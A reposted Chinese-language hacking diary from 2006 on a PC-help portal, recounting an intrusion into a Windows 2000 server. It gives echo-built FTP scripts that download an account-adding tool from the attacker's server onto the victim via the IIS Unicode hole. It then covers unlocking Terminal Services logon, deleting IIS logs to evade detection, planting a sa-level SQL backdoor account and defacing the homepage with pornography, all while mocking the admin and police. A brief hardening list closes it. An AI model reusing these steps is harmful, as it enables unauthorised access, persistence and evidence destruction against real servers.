会员注册 | 电脑急诊 | 中国汽车救援中心网 | 中国电脑视频网 | 装机必备软件 | 淘宝商城
·维修资料下载
·视频教程下载
·
网络教程下载
中文域名 虚拟空间 SQL空间 域名空间 电子书下载
进入论坛 地图
教程 | 技巧 | 笔记本 | 安全 | 网络故障 | 建站经验 | 维修资料 | 行情 | Vista | Win Xp | 手机 | MP3 | DVDC | Q Q | 评测 | DIY | 厂商 | 源码 | 病毒 | 数据恢复
[菜鸟学院] 操作系统 程序设计 网站开发 图像动画 办公软件 [故障查询] CPU 主板 硬盘 内存 显示器 打印机 光驱 显卡 [PC电子书] 软件教程 硬件技术 数据理论 网络技术
【救援中心俱乐部】
120急诊室  菜鸟学院  视频教程
俱乐部活动 软件世界  操作系统
维修资料   网络世界  网站建设
笔记本专栏 硬件世界  聊天专栏
网友靓照   个人专栏  原创交流
灌水乐园   贴图中心  游戏世界
当前位置:首页 > 菜鸟学院 > 操作系统 > 其他系统 > 正文

黑站手记:黑个网站 好难
   2006-5-21 10:18:02 来源:网易学院 进入论坛 添加到收藏夹

序言

如果说黑U漏洞的站有手气背的,大概都比不上我。

第一章

找到一台破机器,看着他开了21、80、135、139、1433、3389

心想蛮好破的,本来没什么兴趣,先用sql客户端连接,sa空密码试试。。。。

居然设置了密码,这个网管的智商可能大于40,呵呵,再看看U之类的喽。。。。

扫描结果显示有U,3389登录上去发现没有输入法漏洞,faint,我还真不知道这service pack怎么能打出这副样子出来,照说打了之后应该没有U漏洞啊。。。。

随便敲个dir+c:\tftp*+/s,等了半天(这机器很烂),居然没有,估计是被尼姆达搞得不行了,才出此烂招,f\*\*!!!

为了快一点,dir+c:\winnt\system32\ftp.exe,没有!!faint!!!

连这个都删??!!比我还变态。。。真没折了?那我的扫描记录留在那里多危险啊!!

靠,这么变态的网管,搞他没商量!!!

想了3秒种,得出了一个结论:

。。。。。。。。。。

其实FTP.exe是存在的~~,在哪里呢?

第二章

呣呣~~,他不是爱打services pack吗?凭他这么智障的网管,肯定忘记了在service pack有一个备份,微软为我们考虑得还挺周到啊,哈哈哈哈

吸取教训,直接整个硬盘查找,慢就慢点吧

dir c:\ftp.exe /s,果然在service pack下面有这个鸟文件,copy过来。。。

好了,echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器(我不会告诉你的~~)

echo xxxxxx >>d 我的帐号,当然也不会告诉你

echo xxxxxx >>d 我的密码,你认为我会告诉你吗?

echo bin >>d 为什么?你们想想吧,反正加上不会遇到麻烦

echo get xxxxx >>d 方法太烂,不好意思告诉你,反正是可以用来加帐号的东西就行

echo bye >>d 礼貌一点,和我得FTP服务器说byebye

OK,

ftp -s:d

等着吧,一会儿功夫,报告cgi error,不管他,dir。。。。

shit !!!没有传过来,难道我的服务器....????

连接上我的服务器看看,一切正常啊,

type d ,也很正常啊,怎么回事情?

ping 目标,发现速度奇慢,我大概知道怎么回事情了!!!

改写d!!!

echo open xxxxx >d

echo asdfasdf >>d

echo adsfasdf >>d

echo user xxxxx >>d

echo xxxxx >>d

echo bin >>d

echo get xxxx >>d

echo bye >>d

OK

ftp -s:d

这次好了,原因不明

连接进去,加帐号,然后3389进去。。。。

第三章

忽然说我这个帐号无权登录,faint!!! 黑个破站怎么这么烦??!!

改terminal services登录帐户限制

在我的机器上点击“我的电脑”-》管理-》\\xxx.xxx.xxx.xxx-》确定(谁会按取消啊,真是。。。)

等了半个世纪左右,出来了服务列表,修改terminal services“属性”,登录帐户修改为“本机上的帐户”,重新启动terminalservices 服务,退出

再从3389登录进去,TMD,总算看到win2000的桌面了。

后记

停掉WWW服务,冲到c:\winnt\system32\logfiles下删w3svc日志,

在sql server里放个帐号,当然权限了sa一致,以后不爽了还能进来逛逛。。。。。

哇哈哈,不怕警察叔叔来找我喽~~!!

顺手改掉他那难看的index.html,放个黄色图片吧,凭那位网管的智商,大概也就看得懂这些了。。。

总结:

1)如果漏洞补丁没打全,那么就不要开这个服务;

2)删除文件时要考虑到备份文件是否存在;

3)端口能少开就少开,少开一点不会死,开多了死得难看。


 
打印】【电脑俱乐部】【电脑视频】【电脑故障】【电脑学院】【电子书】【关闭
精彩视频教程推荐
电子书下载
推荐阅读
·Photoshop尝试修复强光下拍摄的阴
·Photoshop技巧:扩大图片同时减小
·PhotoShop美女抽线效果大法
·基础知识:理解网络交换机的原理
·操作系统任务管理器应用技巧四则
·教程:教你如何迅速制造Vista蓝屏
·高手总结:16个XP/Vista精彩技巧
·教你在Windows安全模式下查杀病毒
·利用自带功能 让XP获得Vista安全
·体验UUCall网络电话:3600秒节约
·调查:微软XP系统装机率还不到番茄
·我让损坏的U盘起死回生
·从XP移植“内码输入法”到Vista 
·Windows系统端口对照详细说明
·从系统安装盘提取原装文件
·消除系统错误 删除文件名乱码的文

视频教程
EasyBoot制作双系统启 EasyBoot制作WinodwsX
最新新闻
·Photoshop尝试修复强光下拍摄的阴阳脸
·Photoshop技巧:扩大图片同时减小图片
·简单几步构建实用的本地DNS服务器
·PhotoShop美女抽线效果大法
·IE8具备“成人网站”专用浏览模式
·基础知识:理解网络交换机的原理 
·操作系统任务管理器应用技巧四则 
·教程:教你如何迅速制造Vista蓝屏死机

装机必备软件下载
 
关于我们 | 合作媒体 | 版权声明 | 联系方式 | 意见反馈 | 广告业务 | 网站地图 | 急救中心

Copyright © 2003--2007 中国电脑援救中心版权所有
鲁ICP备05000605号